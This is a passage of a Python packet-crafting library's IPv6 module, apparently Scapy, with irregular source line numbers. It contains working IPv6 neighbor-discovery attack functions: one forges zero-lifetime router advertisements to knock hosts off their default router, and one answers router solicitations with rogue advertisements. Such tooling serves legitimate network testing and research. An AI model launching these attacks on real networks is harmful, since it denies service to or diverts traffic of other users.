3937         will be sent in loop, separated by 'inter' seconds (see below).
3938         When set to False, a single packet is sent.
3939
3940    inter: When loop parameter is True (the default), this parameter provides
3941         the interval in seconds used for sending NS packets.
3942
3943    iface: to force the sending interface.
3944    """
3945
3946    if not iface:
3947        iface = conf.iface
3948
3949    # Use provided MAC address as source link-layer address option
3950    # or the MAC address of the interface if none is provided.
3951    if not src_lladdr:
3952        src_lladdr = get_if_hwaddr(iface)
3953
3954    # Prepare packets parameters
3955    ether_params = {}
3956    if src_mac:
3957        ether_params["src"] = src_mac
3958
3959    if dst_mac:
3960        ether_params["dst"] = dst_mac
3961
3962    ipv6_params = {}
3963    if src:
3964        ipv6_params["src"] = src
3965    if dst:
3966        ipv6_params["dst"] = dst
3967    else:
3968        # Compute the solicited-node multicast address
3969        # associated with the target address.
3970        tmp = inet_ntop(socket.AF_INET6,
3971                        in6_getnsma(inet_pton(socket.AF_INET6, target)))
3972        ipv6_params["dst"] = tmp
3973
3974    pkt = Ether(**ether_params)
3975    pkt /= IPv6(**ipv6_params)
3976    pkt /= ICMPv6ND_NS(tgt=target)
3977    pkt /= ICMPv6NDOptSrcLLAddr(lladdr=src_lladdr)
3978
3979    sendp(pkt, inter=inter, loop=loop, iface=iface, verbose=0)
3980
3981
def NDP_Attack_Kill_Default_Router(iface=None, mac_src_filter=None,
                                   ip_src_filter=None, reply_mac=None,
                                   tgt_mac=None):
    """
    The purpose of the function is to monitor incoming RA messages
    sent by default routers (RA with a non-zero Router Lifetime value)
    and invalidate them by immediately replying with fake RA messages
    advertising a zero Router Lifetime value.

    The result on receivers is that the router is immediately invalidated,
    i.e. the associated entry is discarded from the default router list
    and destination cache is updated to reflect the change.

    By default, the function considers all RA messages with a non-zero
    Router Lifetime value but provides configuration knobs to allow
    filtering RA sent by specific routers (Ethernet source address).
    With regard to emission, the multicast all-nodes address is used
    by default but a specific target can be used, in order for the DoS to
    apply only to a specific host.

    More precisely, following arguments can be used to change the behavior:

    iface: a specific interface (e.g. "eth0") of the system on which the
         DoS should be launched. If None is provided conf.iface is used.

    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
         Only RA messages received from this source will trigger replies.
         If other default routers advertised their presence on the link,
         their clients will not be impacted by the attack. The default
         value is None: the DoS is not limited to a specific mac address.

    ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
         on. Only RA messages received from this source address will trigger
         replies. If other default routers advertised their presence on the
         link, their clients will not be impacted by the attack. The default
         value is None: the DoS is not limited to a specific IPv6 source
         address.

    reply_mac: allow specifying a specific source mac address for the reply,
         i.e. to prevent the use of the mac address of the interface.

    tgt_mac: allow limiting the effect of the DoS to a specific host,
         by sending the "invalidating RA" only to its mac address.

    Both filters are compared as plain strings against the values found
    in the received packet (req[Ether].src and req[IPv6].src).
    """

    def is_request(req, mac_src_filter, ip_src_filter):
        """
        Check if packet req is an RA from a default router that passes
        the optional source filters.
        """

        if not (Ether in req and IPv6 in req and ICMPv6ND_RA in req):
            return False

        if mac_src_filter and req[Ether].src != mac_src_filter:
            return False

        if ip_src_filter and req[IPv6].src != ip_src_filter:
            return False

        # Only RAs announcing a default router (non-zero Router Lifetime)
        # are worth answering; this also rejects RAs with a zero lifetime
        # such as the ones built by ra_reply_callback below.
        return req[ICMPv6ND_RA].routerlifetime != 0

    def ra_reply_callback(req, reply_mac, tgt_mac, iface):
        """
        Callback that sends an RA with a 0 lifetime
        """

        # The fake RA reuses the IPv6 source address of the received one
        src = req[IPv6].src

        # Prepare packets parameters
        ether_params = {}
        if reply_mac:
            ether_params["src"] = reply_mac

        if tgt_mac:
            ether_params["dst"] = tgt_mac

        # Resolve the link-layer address to advertise BEFORE walking the
        # prefix options: the walk strips the payload of every PIO it
        # visits, so a Source Link-Layer Address option located after a
        # PIO would no longer be reachable once the walk has run.
        if ICMPv6NDOptSrcLLAddr in req:
            mac = req[ICMPv6NDOptSrcLLAddr].lladdr
        else:
            mac = req[Ether].src

        # Basis of fake RA (high pref, zero lifetime)
        rep = Ether(**ether_params) / IPv6(src=src, dst="ff02::1")
        rep /= ICMPv6ND_RA(prf=1, routerlifetime=0)

        # Add it the PIOs from the request. The walk is done on a copy so
        # that the sniffed packet itself is left untouched.
        tmp = req.copy()
        while ICMPv6NDOptPrefixInfo in tmp:
            pio = tmp[ICMPv6NDOptPrefixInfo]
            # Keep a handle on what follows, then isolate this option
            tmp = pio.payload
            del pio.payload
            rep /= pio

        # ... and source link layer address option
        rep /= ICMPv6NDOptSrcLLAddr(lladdr=mac)

        sendp(rep, iface=iface, verbose=0)

        print("Fake RA sent with source address %s" % src)

    if not iface:
        iface = conf.iface
    # To prevent sniffing our own traffic
    if not reply_mac:
        reply_mac = get_if_hwaddr(iface)
    sniff_filter = "icmp6 and not ether src %s" % reply_mac

    sniff(store=0,
          filter=sniff_filter,
          lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter),
          prn=lambda x: ra_reply_callback(x, reply_mac, tgt_mac, iface),
          iface=iface)
4102
4103
def NDP_Attack_Fake_Router(ra, iface=None, mac_src_filter=None,
                           ip_src_filter=None):
    """
    Watch the link for RS messages and answer each of them by sending the
    provided RA message, unmodified, at layer 2 with sendp(). Because the
    RA is emitted at layer 2, a packet starting with IPv6 will not work:
    it has to start with its Ethernet header.

    Example:

      >>> ra  = Ether()/IPv6()/ICMPv6ND_RA()
      >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64)
      >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:2::", prefixlen=64)
      >>> ra /= ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55")
      >>> NDP_Attack_Fake_Router(ra, iface="eth0")
      Fake RA sent in response to RS from fe80::213:58ff:fe8c:b573
      Fake RA sent in response to RS from fe80::213:72ff:fe8c:b9ae
      ...

    Arguments:

    ra: the RA message sent in response to every matching RS message.

    iface: the interface (e.g. "eth0") to listen and send on. When no
         value is provided, conf.iface is used.

    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69"). When set,
         only RS messages whose Ethernet source is this address trigger
         a reply. The provided RA is never modified: to reach only the
         sender of the RS, set the Ethernet destination address of your
         RA to the same value. Default is None (no filtering on the
         Ethernet source of the RS).

    ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2). When
         set, only RS messages whose IPv6 source is this address trigger
         a reply. As for mac_src_filter, you will probably want to set a
         specific Ethernet destination address in the RA.
    """

    if not iface:
        iface = conf.iface

    def _rs_matches(pkt):
        """
        Tell whether pkt is an RS accepted by the configured filters
        """

        if Ether not in pkt or IPv6 not in pkt or ICMPv6ND_RS not in pkt:
            return False

        if mac_src_filter and pkt[Ether].src != mac_src_filter:
            return False

        if ip_src_filter and pkt[IPv6].src != ip_src_filter:
            return False

        return True

    def _answer_rs(pkt):
        """
        Send the RA and report which RS source triggered it
        """

        rs_src = pkt[IPv6].src
        sendp(ra, iface=iface, verbose=0)
        print("Fake RA sent in response to RS from %s" % rs_src)

    sniff(store=0,
          filter="icmp6",
          lfilter=_rs_matches,
          prn=_answer_rs,
          iface=iface)
4183
4184#############################################################################
4185# Pre-load classes                                                         ##
4186#############################################################################
4187
4188
def _get_cls(name):
    """
    Return the module-level object called `name`, falling back to Raw
    when this module has no global of that name.
    """
    try:
        return globals()[name]
    except KeyError:
        return Raw
4191
4192
def _load_dict(d):
    """
    Replace, in place, every value of d by _get_cls(value).

    The set of keys is left unchanged; only the values are rewritten.
    """
    # Iterate over a snapshot of the keys while the values are reassigned
    for key in list(d):
        d[key] = _get_cls(d[key])
4196
4197
# Run _load_dict over each lookup table: every value is replaced by the
# module-level object of that name (Raw when there is none).
for _preload_table in (icmp6ndoptscls, icmp6typescls, ipv6nhcls):
    _load_dict(_preload_table)
# Do not leave the loop variable behind in the module namespace
del _preload_table
4201
4202#############################################################################
4203#############################################################################
4204#                            Layers binding                                 #
4205#############################################################################
4206#############################################################################
4207
# Layer 3 and link-type registrations for IPv6 / IPv46
conf.l3types.register(ETH_P_IPV6, IPv6)
conf.l3types.register_num2layer(ETH_P_ALL, IPv46)
conf.l2types.register(31, IPv6)
conf.l2types.register(DLT_IPV6, IPv6)
conf.l2types.register(DLT_RAW, IPv46)
conf.l2types.register_num2layer(DLT_RAW_ALT, IPv46)

# Lower layers carrying IPv6, selected through the IPv6 ethertype
bind_layers(Ether, IPv6, type=ETH_P_IPV6)
bind_layers(CookedLinux, IPv6, proto=ETH_P_IPV6)
bind_layers(GRE, IPv6, proto=ETH_P_IPV6)
bind_layers(SNAP, IPv6, code=ETH_P_IPV6)
# AF_INET6 values are platform-dependent. For a detailed explanation, read
# https://github.com/the-tcpdump-group/libpcap/blob/f98637ad7f086a34c4027339c9639ae1ef842df3/gencode.c#L3333-L3354  # noqa: E501
bind_layers(Loopback, IPv6, type=0x18 if WINDOWS else socket.AF_INET6)
# Upper layers and tunnels, selected through the protocol / next header
bind_layers(IPerror6, TCPerror, nh=socket.IPPROTO_TCP)
bind_layers(IPerror6, UDPerror, nh=socket.IPPROTO_UDP)
bind_layers(IPv6, TCP, nh=socket.IPPROTO_TCP)
bind_layers(IPv6, UDP, nh=socket.IPPROTO_UDP)
bind_layers(IP, IPv6, proto=socket.IPPROTO_IPV6)
bind_layers(IPv6, IPv6, nh=socket.IPPROTO_IPV6)
bind_layers(IPv6, IP, nh=socket.IPPROTO_IPIP)
bind_layers(IPv6, GRE, nh=socket.IPPROTO_GRE)
4233